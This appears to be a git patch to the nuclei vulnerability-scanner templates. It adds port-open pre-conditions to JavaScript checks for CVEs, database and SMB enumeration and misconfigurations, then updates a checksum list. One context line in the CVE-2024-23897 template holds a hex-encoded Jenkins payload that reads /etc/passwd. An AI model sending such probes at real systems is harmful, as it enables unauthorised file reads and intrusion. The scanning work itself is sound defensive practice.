b/javascript/cves/2020/CVE-2020-7247.yaml @@ -28,8 +28,11 @@ info: vendor: openbsd product: opensmtpd tags: packetstorm,cve,cve2020,js,smtp,opensmtpd,network,rce,oast,kev,openbsd + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | const smtp = require('nuclei/smtp'); const client = new smtp.Client(Host,Port); const message = new smtp.SMTPMessage(); diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml index f018043b2e..57c49474b6 100644 --- a/javascript/cves/2023/CVE-2023-46604.yaml +++ b/javascript/cves/2023/CVE-2023-46604.yaml @@ -37,7 +37,9 @@ variables: final: "{{prefix}}{{classname}}" javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | let m1 = require('nuclei/net'); let m2 = require('nuclei/bytes'); let b = m2.Buffer(); diff --git a/javascript/cves/2023/CVE-2023-48795.yaml b/javascript/cves/2023/CVE-2023-48795.yaml index 3ffee1767f..d28618fffb 100644 --- a/javascript/cves/2023/CVE-2023-48795.yaml +++ b/javascript/cves/2023/CVE-2023-48795.yaml @@ -32,8 +32,11 @@ info: - product:"openssh" - cpe:"cpe:2.3:a:openbsd:openssh" tags: cve,cve2023,packetstorm,seclists,js,ssh,network,passive,openbsd + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | const m = require("nuclei/ssh"); const c = m.SSHClient(); const response = c.ConnectSSHInfoMode(Host, Port); diff --git a/javascript/cves/2024/CVE-2024-23897.yaml b/javascript/cves/2024/CVE-2024-23897.yaml index 95cee4790f..ad32e1e79a 100644 --- a/javascript/cves/2024/CVE-2024-23897.yaml +++ b/javascript/cves/2024/CVE-2024-23897.yaml @@ -35,7 +35,9 @@ variables: payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}" javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | let m = require('nuclei/net'); let name=(Host.includes(':') ? Host : Host+":80"); let conn,conn2; diff --git a/javascript/default-logins/redis-default-logins.yaml b/javascript/default-logins/redis-default-logins.yaml index 2092cfa5c9..930f643a0f 100644 --- a/javascript/default-logins/redis-default-logins.yaml +++ b/javascript/default-logins/redis-default-logins.yaml @@ -22,6 +22,7 @@ info: - intitle:"airflow - dags" || http.html:"apache airflow" - intitle:"sign in - airflow" tags: js,redis,default-login,network + javascript: - pre-condition: | isPortOpen(Host,Port) diff --git a/javascript/detection/oracle-tns-listener.yaml b/javascript/detection/oracle-tns-listener.yaml index 93c76997e7..887a289c3d 100644 --- a/javascript/detection/oracle-tns-listener.yaml +++ b/javascript/detection/oracle-tns-listener.yaml @@ -15,7 +15,9 @@ info: tags: js,detect,oracle,tns,network javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | var m = require("nuclei/oracle"); var response = m.IsOracle(Host, Port); Export(response); diff --git a/javascript/detection/samba-detect.yaml b/javascript/detection/samba-detect.yaml index c7c340fab9..e88d83ed16 100644 --- a/javascript/detection/samba-detect.yaml +++ b/javascript/detection/samba-detect.yaml @@ -13,7 +13,9 @@ info: vendor: dionaea tags: js,network,samba,detect,linux javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | let m = require("nuclei/smb"); let c = new m.SMBClient(); let response = c.ConnectSMBInfoMode(Host, Port); diff --git a/javascript/detection/ssh-auth-methods.yaml b/javascript/detection/ssh-auth-methods.yaml index f3b05c809e..000e98ed99 100644 --- a/javascript/detection/ssh-auth-methods.yaml +++ b/javascript/detection/ssh-auth-methods.yaml @@ -14,7 +14,9 @@ info: tags: js,detect,ssh,enum,network javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | var m = require("nuclei/ssh"); var c = m.SSHClient(); var response = c.ConnectSSHInfoMode(Host, Port); diff --git a/javascript/enumeration/checkpoint-firewall-enum.yaml b/javascript/enumeration/checkpoint-firewall-enum.yaml index a2c4ce2f7a..13a383d839 100644 --- a/javascript/enumeration/checkpoint-firewall-enum.yaml +++ b/javascript/enumeration/checkpoint-firewall-enum.yaml @@ -13,7 +13,9 @@ info: tags: js,network,firewall,checkpoint,enum javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | let packet = bytes.NewBuffer(); let prob = "\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00" data = packet.Write(prob) diff --git a/javascript/enumeration/ldap/ldap-metadata.yaml b/javascript/enumeration/ldap/ldap-metadata.yaml index c9f1fd8b63..65c2229624 100644 --- a/javascript/enumeration/ldap/ldap-metadata.yaml +++ b/javascript/enumeration/ldap/ldap-metadata.yaml @@ -14,7 +14,9 @@ info: tags: js,network,ldap javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | const ldap = require('nuclei/ldap'); const cfg = new ldap.Config(); cfg.Upgrade = true; diff --git a/javascript/enumeration/mysql/mysql-default-login.yaml b/javascript/enumeration/mysql/mysql-default-login.yaml index 6af3fa95a9..393a6d9828 100644 --- a/javascript/enumeration/mysql/mysql-default-login.yaml +++ b/javascript/enumeration/mysql/mysql-default-login.yaml @@ -14,10 +14,7 @@ info: javascript: - pre-condition: | - var m = require("nuclei/mysql"); - var c = m.MySQLClient(); - c.IsMySQL(Host, Port); - + isPortOpen(Host,Port); code: | var m = require("nuclei/mysql"); var c = m.MySQLClient(); diff --git a/javascript/enumeration/mysql/mysql-info.yaml b/javascript/enumeration/mysql/mysql-info.yaml index e791921b22..7cfcce89d3 100644 --- a/javascript/enumeration/mysql/mysql-info.yaml +++ b/javascript/enumeration/mysql/mysql-info.yaml @@ -12,8 +12,11 @@ info: max-request: 1 shodan-query: "port:3306" tags: js,mssql,network,enum + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | var m = require("nuclei/mysql"); var c = m.MySQLClient(); var response = c.FingerprintMySQL(Host,Port); diff --git a/javascript/enumeration/mysql/mysql-show-databases.yaml b/javascript/enumeration/mysql/mysql-show-databases.yaml index ee5a50b614..2612165a37 100644 --- a/javascript/enumeration/mysql/mysql-show-databases.yaml +++ b/javascript/enumeration/mysql/mysql-show-databases.yaml @@ -12,7 +12,9 @@ info: shodan-query: "port:3306" tags: js,mysql,network,enum javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | let m = require('nuclei/mysql'); let c = m.MySQLClient(); let response = c.ExecuteQuery(Host,Port,User,Pass,Query); diff --git a/javascript/enumeration/mysql/mysql-show-variables.yaml b/javascript/enumeration/mysql/mysql-show-variables.yaml index 1896ca42a8..e8c453f63f 100644 --- a/javascript/enumeration/mysql/mysql-show-variables.yaml +++ b/javascript/enumeration/mysql/mysql-show-variables.yaml @@ -13,7 +13,9 @@ info: tags: js,mysql,network,enum javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | let m = require('nuclei/mysql'); let c = m.MySQLClient(); let response = c.ExecuteQuery(Host,Port,User,Pass,Query); diff --git a/javascript/enumeration/mysql/mysql-user-enum.yaml b/javascript/enumeration/mysql/mysql-user-enum.yaml index 11855aa4f4..2c38ea218b 100644 --- a/javascript/enumeration/mysql/mysql-user-enum.yaml +++ b/javascript/enumeration/mysql/mysql-user-enum.yaml @@ -13,8 +13,11 @@ info: max-request: 16 shodan-query: "port:3306" tags: js,mysql,network,enum + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | let m = require('nuclei/mysql'); let c = m.MySQLClient(); let response = c.ExecuteQuery(Host,Port,User,Pass,Query); diff --git a/javascript/enumeration/pgsql/pgsql-default-db.yaml b/javascript/enumeration/pgsql/pgsql-default-db.yaml index d3520c261e..828a5190aa 100644 --- a/javascript/enumeration/pgsql/pgsql-default-db.yaml +++ b/javascript/enumeration/pgsql/pgsql-default-db.yaml @@ -13,11 +13,10 @@ info: max-request: 40 shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,authenticated,enum + javascript: - pre-condition: | - var m = require("nuclei/postgres"); - var c = m.PGClient(); - c.IsPostgres(Host, Port); + isPortOpen(Host,Port); code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; diff --git a/javascript/enumeration/pgsql/pgsql-file-read.yaml b/javascript/enumeration/pgsql/pgsql-file-read.yaml index 2e3f505e39..f12def1f40 100644 --- a/javascript/enumeration/pgsql/pgsql-file-read.yaml +++ b/javascript/enumeration/pgsql/pgsql-file-read.yaml @@ -15,9 +15,7 @@ info: tags: js,network,postgresql,authenticated,enum javascript: - pre-condition: | - var m = require("nuclei/postgres"); - var c = m.PGClient(); - c.IsPostgres(Host, Port); + isPortOpen(Host,Port); code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; diff --git a/javascript/enumeration/pgsql/pgsql-list-database.yaml b/javascript/enumeration/pgsql/pgsql-list-database.yaml index c32d8addb0..0c72259889 100644 --- a/javascript/enumeration/pgsql/pgsql-list-database.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-database.yaml @@ -16,9 +16,7 @@ info: tags: js,network,postgresql,authenticated,enum javascript: - pre-condition: | - var m = require("nuclei/postgres"); - var c = m.PGClient(); - c.IsPostgres(Host, Port); + isPortOpen(Host,Port); code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; diff --git a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml index 8738211d67..0d2ad7056c 100644 --- a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml @@ -17,9 +17,7 @@ info: tags: js,network,postgresql,authenticated,enum javascript: - pre-condition: | - var m = require("nuclei/postgres"); - var c = m.PGClient(); - c.IsPostgres(Host, Port); + isPortOpen(Host,Port); code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; diff --git a/javascript/enumeration/pgsql/pgsql-list-users.yaml b/javascript/enumeration/pgsql/pgsql-list-users.yaml index 5be3639250..06ebbe4189 100644 --- a/javascript/enumeration/pgsql/pgsql-list-users.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-users.yaml @@ -15,9 +15,7 @@ info: tags: js,network,postgresql,enum,authenticated javascript: - pre-condition: | - var m = require("nuclei/postgres"); - var c = m.PGClient(); - c.IsPostgres(Host, Port); + isPortOpen(Host,Port); code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; diff --git a/javascript/enumeration/pgsql/pgsql-version-detect.yaml b/javascript/enumeration/pgsql/pgsql-version-detect.yaml index 9c23f5b4fc..c0d11f1656 100644 --- a/javascript/enumeration/pgsql/pgsql-version-detect.yaml +++ b/javascript/enumeration/pgsql/pgsql-version-detect.yaml @@ -13,11 +13,10 @@ info: max-request: 8 shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,enum,authenticated + javascript: - pre-condition: | - var m = require("nuclei/postgres"); - var c = m.PGClient(); - c.IsPostgres(Host, Port); + isPortOpen(Host,Port); code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; diff --git a/javascript/enumeration/pop3/pop3-capabilities-enum.yaml b/javascript/enumeration/pop3/pop3-capabilities-enum.yaml index b363e141f6..8e9c3645c0 100644 --- a/javascript/enumeration/pop3/pop3-capabilities-enum.yaml +++ b/javascript/enumeration/pop3/pop3-capabilities-enum.yaml @@ -13,8 +13,11 @@ info: max-request: 1 shodan-query: "port:110" tags: js,network,pop3,enum + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | let data = "CAPA\r\n" let c = require("nuclei/net"); let conn = c.Open('tcp', `${Host}:${Port}`); diff --git a/javascript/enumeration/redis/redis-info.yaml b/javascript/enumeration/redis/redis-info.yaml index 4d1feed2e6..5ba6ca9341 100644 --- a/javascript/enumeration/redis/redis-info.yaml +++ b/javascript/enumeration/redis/redis-info.yaml @@ -24,8 +24,11 @@ info: - intitle:"airflow - dags" || http.html:"apache airflow" - intitle:"sign in - airflow" tags: js,redis,network,enum + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | const redis = require('nuclei/redis'); const info = redis.GetServerInfo(Host,Port); Export(info); diff --git a/javascript/enumeration/redis/redis-require-auth.yaml b/javascript/enumeration/redis/redis-require-auth.yaml index 990a483a20..fb326c1ca3 100644 --- a/javascript/enumeration/redis/redis-require-auth.yaml +++ b/javascript/enumeration/redis/redis-require-auth.yaml @@ -24,8 +24,11 @@ info: - intitle:"airflow - dags" || http.html:"apache airflow" - intitle:"sign in - airflow" tags: js,redis,network,enum + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | const redis = require('nuclei/redis'); const isAuthenticated = redis.IsAuthenticated(Host,Port); Export(isAuthenticated); diff --git a/javascript/enumeration/rsync/rsync-list-modules.yaml b/javascript/enumeration/rsync/rsync-list-modules.yaml index 9bcfbdc8dc..d42a51740d 100644 --- a/javascript/enumeration/rsync/rsync-list-modules.yaml +++ b/javascript/enumeration/rsync/rsync-list-modules.yaml @@ -13,8 +13,11 @@ info: max-request: 1 shodan-query: port:873 tags: network,rsync,enum,js + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | const c = require("nuclei/net"); const data = "@RSYNCD: 31.0\n\n" const conn = c.Open('tcp', `${Host}:${Port}`); diff --git a/javascript/enumeration/rsync/rsync-version.yaml b/javascript/enumeration/rsync/rsync-version.yaml index 628a80d5d6..fa0d3adf9b 100644 --- a/javascript/enumeration/rsync/rsync-version.yaml +++ b/javascript/enumeration/rsync/rsync-version.yaml @@ -13,7 +13,9 @@ info: tags: js,network,rsync,enum javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | let m = require('nuclei/rsync'); let response = m.IsRsync(Host,Port); Export(response); diff --git a/javascript/enumeration/smb/smb-default-creds.yaml b/javascript/enumeration/smb/smb-default-creds.yaml index 2729ffeb85..4d5cb7b8d7 100644 --- a/javascript/enumeration/smb/smb-default-creds.yaml +++ b/javascript/enumeration/smb/smb-default-creds.yaml @@ -15,8 +15,11 @@ info: product: dionaea vendor: dionaea tags: js,network,smb,enum,default,bruteforce + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | var m = require("nuclei/smb"); var c = new m.SMBClient(); var response = c.ListShares(Host, Port, User, Pass); diff --git a/javascript/enumeration/smb/smb-enum-domains.yaml b/javascript/enumeration/smb/smb-enum-domains.yaml index 4f4a817145..4ad13ed913 100644 --- a/javascript/enumeration/smb/smb-enum-domains.yaml +++ b/javascript/enumeration/smb/smb-enum-domains.yaml @@ -15,8 +15,11 @@ info: product: dionaea vendor: dionaea tags: js,network,smb,enum + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | var m = require("nuclei/smb"); var c = new m.SMBClient(); var response = c.ListSMBv2Metadata(Host, Port); diff --git a/javascript/enumeration/smb/smb-enum.yaml b/javascript/enumeration/smb/smb-enum.yaml index 608241aa8e..6a40dca5b2 100644 --- a/javascript/enumeration/smb/smb-enum.yaml +++ b/javascript/enumeration/smb/smb-enum.yaml @@ -16,8 +16,11 @@ info: product: dionaea vendor: dionaea tags: js,network,smb,enum + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | var m = require("nuclei/smb"); var c = m.SMBClient(); var response = c.ListSMBv2Metadata(Host, Port); diff --git a/javascript/enumeration/smb/smb-os-detect.yaml b/javascript/enumeration/smb/smb-os-detect.yaml index bc445e0aea..b279a0a4ca 100644 --- a/javascript/enumeration/smb/smb-os-detect.yaml +++ b/javascript/enumeration/smb/smb-os-detect.yaml @@ -14,8 +14,11 @@ info: product: dionaea vendor: dionaea tags: js,network,smb,enum,os + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | var m = require("nuclei/smb"); var c = new m.SMBClient(); var response = c.ListSMBv2Metadata(Host, Port); diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml index 8e4566cd53..1fb9c33452 100644 --- a/javascript/enumeration/smb/smb-version-detect.yaml +++ b/javascript/enumeration/smb/smb-version-detect.yaml @@ -12,8 +12,11 @@ info: product: dionaea vendor: dionaea tags: js,network,smb,enum + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | let m = require("nuclei/smb"); let c = new m.SMBClient(); let response = c.ConnectSMBInfoMode(Host, Port); diff --git a/javascript/enumeration/smb/smb2-capabilities.yaml b/javascript/enumeration/smb/smb2-capabilities.yaml index cc588eb295..6f190072d3 100644 --- a/javascript/enumeration/smb/smb2-capabilities.yaml +++ b/javascript/enumeration/smb/smb2-capabilities.yaml @@ -14,8 +14,11 @@ info: product: dionaea vendor: dionaea tags: js,network,smb,enum + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | var m = require("nuclei/smb"); var c = m.SMBClient(); var response = c.ConnectSMBInfoMode(Host, Port); diff --git a/javascript/enumeration/smb/smb2-server-time.yaml b/javascript/enumeration/smb/smb2-server-time.yaml index 796af38598..40311b77c1 100644 --- a/javascript/enumeration/smb/smb2-server-time.yaml +++ b/javascript/enumeration/smb/smb2-server-time.yaml @@ -15,8 +15,11 @@ info: product: dionaea vendor: dionaea tags: js,network,smb,enum + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | var m = require("nuclei/smb"); var c = m.SMBClient(); var response = c.ConnectSMBInfoMode(Host,Port); diff --git a/javascript/misconfiguration/mysql/mysql-empty-password.yaml b/javascript/misconfiguration/mysql/mysql-empty-password.yaml index 9b9a977fd5..305deae92a 100644 --- a/javascript/misconfiguration/mysql/mysql-empty-password.yaml +++ b/javascript/misconfiguration/mysql/mysql-empty-password.yaml @@ -13,10 +13,7 @@ info: javascript: - pre-condition: | - var m = require("nuclei/mysql"); - var c = m.MySQLClient(); - c.IsMySQL(Host, Port); - + isPortOpen(Host,Port); code: | var m = require("nuclei/mysql"); var c = m.MySQLClient(); diff --git a/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml b/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml index ab6cebda55..9e6d14b5e7 100644 --- a/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml +++ b/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml @@ -13,8 +13,11 @@ info: max-request: 1 shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,authenticated + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; const connected = client.Connect(Host, Port, User, Pass); diff --git a/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml b/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml index 7b84c5d313..f149107cb0 100644 --- a/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml +++ b/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml @@ -16,7 +16,9 @@ info: shodan-query: "product:\"PostgreSQL\"" tags: postgresql,js,network,rce javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; const collab = shurl diff --git a/javascript/misconfiguration/smb/smb-anonymous-access.yaml b/javascript/misconfiguration/smb/smb-anonymous-access.yaml index bf93e20c96..749e9f8d7e 100644 --- a/javascript/misconfiguration/smb/smb-anonymous-access.yaml +++ b/javascript/misconfiguration/smb/smb-anonymous-access.yaml @@ -16,7 +16,9 @@ info: vendor: dionaea tags: js,network,smb,enum,misconfig javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | var m = require("nuclei/smb"); var c = m.SMBClient(); var response = c.ListShares(Host,Port,User,Pass); diff --git a/javascript/misconfiguration/smb/smb-shares.yaml b/javascript/misconfiguration/smb/smb-shares.yaml index 809e3d3c2e..2394816c01 100644 --- a/javascript/misconfiguration/smb/smb-shares.yaml +++ b/javascript/misconfiguration/smb/smb-shares.yaml @@ -16,7 +16,9 @@ info: vendor: dionaea tags: js,network,smb,enum javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | var m = require("nuclei/smb"); var c = m.SMBClient(); var response = c.ListShares(Host, Port, User, Pass); diff --git a/javascript/misconfiguration/smb/smb-signing-not-required.yaml b/javascript/misconfiguration/smb/smb-signing-not-required.yaml index 3015194aca..bc1cddccda 100644 --- a/javascript/misconfiguration/smb/smb-signing-not-required.yaml +++ b/javascript/misconfiguration/smb/smb-signing-not-required.yaml @@ -17,7 +17,9 @@ info: vendor: dionaea tags: js,network,smb,enum javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | var m = require("nuclei/smb"); var c = m.SMBClient(); var response = c.ListSMBv2Metadata(Host, Port, User, Pass); diff --git a/javascript/udp/detection/tftp-detect.yaml b/javascript/udp/detection/tftp-detect.yaml index 6508f1b67d..5f889a2468 100644 --- a/javascript/udp/detection/tftp-detect.yaml +++ b/javascript/udp/detection/tftp-detect.yaml @@ -12,7 +12,9 @@ info: shodan-query: "port:69" tags: js,tftp,udp,network javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | let packet = bytes.NewBuffer(); let message = "1.txt" let data = message; From 788b9c473f07a81ea88ac87e81ae8a83c7768544 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 12:17:55 +0000 Subject: [PATCH 1077/1841] Auto Generated Templates Checksum [Wed Jul 10 12:17:55 UTC 2024] :robot: --- templates-checksum.txt | 152 ++++++++++++++++++++--------------------- 1 file changed, 76 insertions(+), 76 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 49ea616153..443ac2312b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -223,8 +223,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:577bdfb13c7dccf9a8cc64cf5fe52348cfee4992 -cves.json-checksum.txt:8ccf0562968be69b50a398c4e12384370a601513 +cves.json:195a062188e964c090fb5e569831f7956db9829a +cves.json-checksum.txt:543480fd5d685fb2dd4d1ca242c6dfa4e5ffa6b1 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3493,7 +3493,7 @@ http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 -http/cves/2024/CVE-2024-6188.yaml:e510a62d65d344e2a3074e98a40fe3e65cebb755 +http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -6786,78 +6786,78 @@ http/osint/user-enumeration/zillow.yaml:6310312dfbeca22632a8b56feaf02d6a8d63c2a5 http/osint/user-enumeration/zmarsacom.yaml:ffb6dde4769b58aed12e36b600faa66348c2f3a0 http/osint/user-enumeration/zomato.yaml:611325521c42aab8a0117b819dcecb3aae9d8df4 http/osint/user-enumeration/zoomitir.yaml:deb452a0a5dd3bbfad1feadbacc72e7c97ba832f -http/takeovers/aftership-takeover.yaml:439029c5274c5551fd7a3987e35cbf386349be83 -http/takeovers/agilecrm-takeover.yaml:e9494110d7e536b0396bcbb14066007f20fb638e -http/takeovers/aha-takeover.yaml:58e3e7a7486be85c7687c793b5663b84759788a8 -http/takeovers/airee-takeover.yaml:bd00657159494039fc36913d03ddbf767fa1b93b -http/takeovers/anima-takeover.yaml:959b664c800ede2e97646180a495f6295d916231 -http/takeovers/announcekit-takeover.yaml:92fb87a534f3f920e480a963886f8796836c8383 -http/takeovers/aws-bucket-takeover.yaml:533b13757c82d22d8235f679fadfda0e036d4591 -http/takeovers/bigcartel-takeover.yaml:6a8f5abf7259eb5f4a4106653fc665b950b4190a -http/takeovers/bitbucket-takeover.yaml:60402aa2ecf993deccac40923f21ce71974dc780 -http/takeovers/campaignmonitor-takeover.yaml:615bfc25c0b488b95d44a0eda7bb5d7af254cacf -http/takeovers/canny-takeover.yaml:cc5a760aa65559322a94344f7add91e523a63db1 -http/takeovers/cargo-takeover.yaml:42db7ee4771a5cbddc6e2b8072070c583d6fd452 -http/takeovers/cargocollective-takeover.yaml:dde78512f960c62936577c19801b1446ec65d5d3 -http/takeovers/clever-takeover.yaml:f4d45f5b42f376d3258d2b4140a9dad14e25cd87 -http/takeovers/flexbe-takeover.yaml:2c453090252f72ffe9b6e7671c5b8fad6db6f8f8 -http/takeovers/frontify-takeover.yaml:e7700c7ad9bb5a761d8bd1395c6a5360c91b3dcb -http/takeovers/gemfury-takeover.yaml:69d22f9c935be01d0ebad5946a9766eafe12fc68 -http/takeovers/getresponse-takeover.yaml:5eff48c5b7d27eeede3d2e7fba1a8a6f314fa9bd -http/takeovers/ghost-takeover.yaml:1302f558b7babb99a557a5b91e3e9cb4f5f7eb75 -http/takeovers/gitbook-takeover.yaml:d552ad1c4821e8f77e4fcda9126f8aa5c736c7b1 -http/takeovers/github-takeover.yaml:41bdd2fbe295a5faf309d521f8789ae317d4a563 -http/takeovers/gohire-takeover.yaml:9ddd4f9e2ac85827c10827a31c9c8dc58e3204ae -http/takeovers/hatenablog-takeover.yaml:fc21976cb0c4a8fbad25b611c142c08ec4d62ac8 -http/takeovers/helpdocs-takeover.yaml:6a5760ef0e27000d68241258b20b27ef75fb2be1 -http/takeovers/helpjuice-takeover.yaml:5147fe356cc08f47440019580263508e1ae23985 -http/takeovers/helprace-takeover.yaml:49c3264822b8ad59265004d9c59e54092ad6ab0c -http/takeovers/helpscout-takeover.yaml:1d283328f15ec4bda0c00b289ec1f4f794386ee3 -http/takeovers/hubspot-takeover.yaml:259ec7b257f0a97fdf4072fbdd95f0d24e4a44c5 -http/takeovers/intercom-takeover.yaml:1b9b0afce9a7bff6feccb2008af6703773824887 -http/takeovers/jazzhr-takeover.yaml:45651efc7c734e82c68a2b7b7abe69f93a940fa1 -http/takeovers/jetbrains-takeover.yaml:2ef07afb2359adc45aae0497c1015a4771fc92da -http/takeovers/kinsta-takeover.yaml:82ff78f9f49bf78183233e37895b210787e68e5d -http/takeovers/launchrock-takeover.yaml:bc3a23ba12749cc8e833d97fc8ce5ecc3070c641 -http/takeovers/leadpages-takeover.yaml:0fac504c6dd06006e13b6fdfa008710066294475 -http/takeovers/lemlist-takeover.yaml:9ecff3bc0bc8306be6253f9204d080f137596806 -http/takeovers/mashery-takeover.yaml:93bb5ee3f03a4216b1d885448c97d315e154ddef -http/takeovers/meteor-takeover.yaml:ff2cb391d01cdb8c4bed85f9eab188ee2030d917 -http/takeovers/netlify-takeover.yaml:13255b0011bb56f304fd939c9158a6c7c6172c4e -http/takeovers/ngrok-takeover.yaml:4b03a530ce7f4d8be606c4e5d86594eca182e157 -http/takeovers/pagewiz-takeover.yaml:e0204acfea6a7947a2b6ac79b949585c03c928cc -http/takeovers/pantheon-takeover.yaml:32223d5dbfb494c86bb74d0e3c9f3593e537d2ec -http/takeovers/pingdom-takeover.yaml:d0b32dce1ec96bde02b58450744b7f653db954c5 -http/takeovers/proposify-takeover.yaml:a20f7e31b866d5a312b24762eb9c9c63a6f3fcd7 -http/takeovers/readme-takeover.yaml:4d7cc8139b396b469eca0727eaf5d8b0d2ba23ab -http/takeovers/readthedocs-takeover.yaml:6c814ab335095cc1d6e1135bc7cce56317042ce9 -http/takeovers/shopify-takeover.yaml:d05e891b76c2666903e0ec058799a82dbe1eb3ac -http/takeovers/short-io.yaml:b0d47a64d093177e53bcc5ac16fea22d3ba45939 -http/takeovers/simplebooklet-takeover.yaml:448dd937d9559e0c6d180f9d96f41838d4ec67e8 -http/takeovers/smartjob-takeover.yaml:bb0363423b3208375c0c1f61ed48187b90057ee8 -http/takeovers/smugmug-takeover.yaml:6ea3ec73d535db0f8e87ea40aa458ac44a18f7d0 -http/takeovers/softr-takeover.yaml:a47cd0392585f45846dbbb70a05574cc564e18e6 -http/takeovers/sprintful-takeover.yaml:b9b552223b69e1b9086b442307c22de6f8bfa864 -http/takeovers/squadcast-takeover.yaml:779b3c54dab067369ffa422d108a2de9b81a87b2 -http/takeovers/strikingly-takeover.yaml:9aa7d5d97af3a23c2eddf1035ba17eea747db30f -http/takeovers/surge-takeover.yaml:0f7c8583cebc4244dd217376b270cdce848441d4 -http/takeovers/surveygizmo-takeover.yaml:9f2b0bb8599c05d03d37ce48e1b7ae2bdc92c523 -http/takeovers/surveysparrow-takeover.yaml:1e8b06deab5ec653168e595223f3eb83bb043796 -http/takeovers/tave-takeover.yaml:36d44f071b52aad95c3496fd4afeb0c50effd4c2 -http/takeovers/teamwork-takeover.yaml:80d707c9c8edc27bffcc1e6652d671596cd736a2 -http/takeovers/tilda-takeover.yaml:4a3011ec77333254e44089aa1ed9397913448bc3 -http/takeovers/tumblr-takeover.yaml:b9ccf4e5f859efe2e752e99a45ab8fc976e4e2f8 